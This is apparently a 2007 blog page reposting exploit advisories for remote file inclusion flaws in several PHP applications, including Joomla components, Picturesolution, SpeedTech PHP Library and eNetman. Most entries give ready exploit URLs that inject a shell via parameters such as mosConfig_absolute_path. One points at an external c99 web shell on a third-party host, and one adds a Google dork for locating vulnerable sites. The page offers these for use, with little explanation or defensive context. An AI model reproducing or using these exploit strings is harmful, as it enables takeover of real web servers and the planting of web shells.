Your Ad Here
Google
 

Tuesday, October 9, 2007

Joomla component MOSMediaLite451 Remote File Inclusion Vulnerability

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Scripts : MOSMediaLite451
Discovered By : k1n9k0ng
Scripts site : http://www.djoomla.com/component/option,com_remository/Itemid,2/
func,fileinfo/id,104/
Thanks To : #sekuritionline, #semprol, #bajingan, #mimid, #r.i.p, #x-code, #yogyafree
special To : adhietslank, babypunk, cyberlog, cah_gemblunkz, the_sims, ARiee, letjen, k1tk4t
site : www.sekuritionline.net
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

bug Script:
include_once( $mosConfig_absolute_path . "/administrator/components/com_mosmedia/mosmedia.config.php" );

bug found:
"http://www.site.net/administrator/components/com_mosmedia/
includes/credits.html.php?mosConfig_absolute_path=[shell]
"http://www.site.net/administrator/components/com_mosmedia/
includes/info.html.php?mosConfig_absolute_path=[shell]
"http://www.site.net/administrator/components/com_mosmedia/
includes/media.divs.php?mosConfig_absolute_path=[shell]
"http://www.site.net/administrator/components/com_mosmedia/
includes/media.divs.js.php?mosConfig_absolute_path=[shell]
"http://www.site.net/administrator/components/com_mosmedia/
includes/purchase.html.php?mosConfig_absolute_path=[shell]
"http://www.site.net/administrator/components/com_mosmedia/
includes/support.html.php?mosConfig_absolute_path=[shell]

# milw0rm.com [2007-10-08]

Monday, October 8, 2007

Picturesolution <= v2.1 (config.php path) Remote File Inclusion Vulnerabilities

Found By : Mogatil , http://www.hackteach.org/cc/
Posted By : Cold z3ro , http://www.hackteach.org/cc/


Exploit :

/install/config.php?path=http://membres.lycos.fr/prirato1/c99.txt?


Example :
http://www.xxx.de/Picssolution/install/config.php?path=[shell]


==================================================
==================================================
Note To All Frindes And Milw0rm users :

http://www.hackteach.org/cc/ Is Back , Join Us !
Use Our English Forum From This link
http://today4host.net/scripts/short/?id=682
==================================================
==================================================

panoramic joomla component 1.0 Remote File Include Vulnerability

# panoramic joomla component 1.0 Remote File Include Vulnerability

Component : com_panoramic version 1.0
Download script : http://www.webmaster-tips.net/
Dicovered by : NoGe
Contact : pace.noge@hotmail.com

==================================================================================

# Vulnerable found in /administrator/components/com_panoramic/admin.panoramic.php

line 3 include( "$mosConfig_live_site/components/com_panoramic/about.html" );

# Exploit

http://localhost/path/administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=[evilcode]
# google dork

inurl:com_panoramic

Monday, September 3, 2007

SpeedTech PHP Library <= Remote File Inclusion Vulnerability

# SpeedTech PHP Library <= Remote File Inclusion Vulnerability

#ERROR1:stphpapplication.php
#require_once("$STPHPLIB_DIR/stphpobject.php");<<< rfi coded.
#
#Other Files:
# stphpapplication.php?STPHPLIB_DIR=[[Sh3LLScript]]
# stphpbtnimage.php?STPHPLIB_DIR=[[Sh3LLScript]]
# stphpform.php?STPHPLIB_DIR=[[Sh3LLScript]]
#############################################################
#
#http://php.html.it/script/vedi/1872/stphplibrary/
#
#############################################################
#LEETSECURITY.ORG <<<< sanal alemde bizde var�z...
#############################################################
#coded by ..Wocker..
# milw0rm.com [2007-09-03]

eNetman - The Enchanced Network Manager Remote File Inclusion

Title : eNetman - The Enchanced Network Manager Remote File Inclusion
URL : http://freshmeat.net/projects/enetman/
Author : JaheeM
Exploit : senetman/html/index.php?page=

Thanks To : #asc, IRC.ASCNET.BIZ

# milw0rm.com [2007-09-03]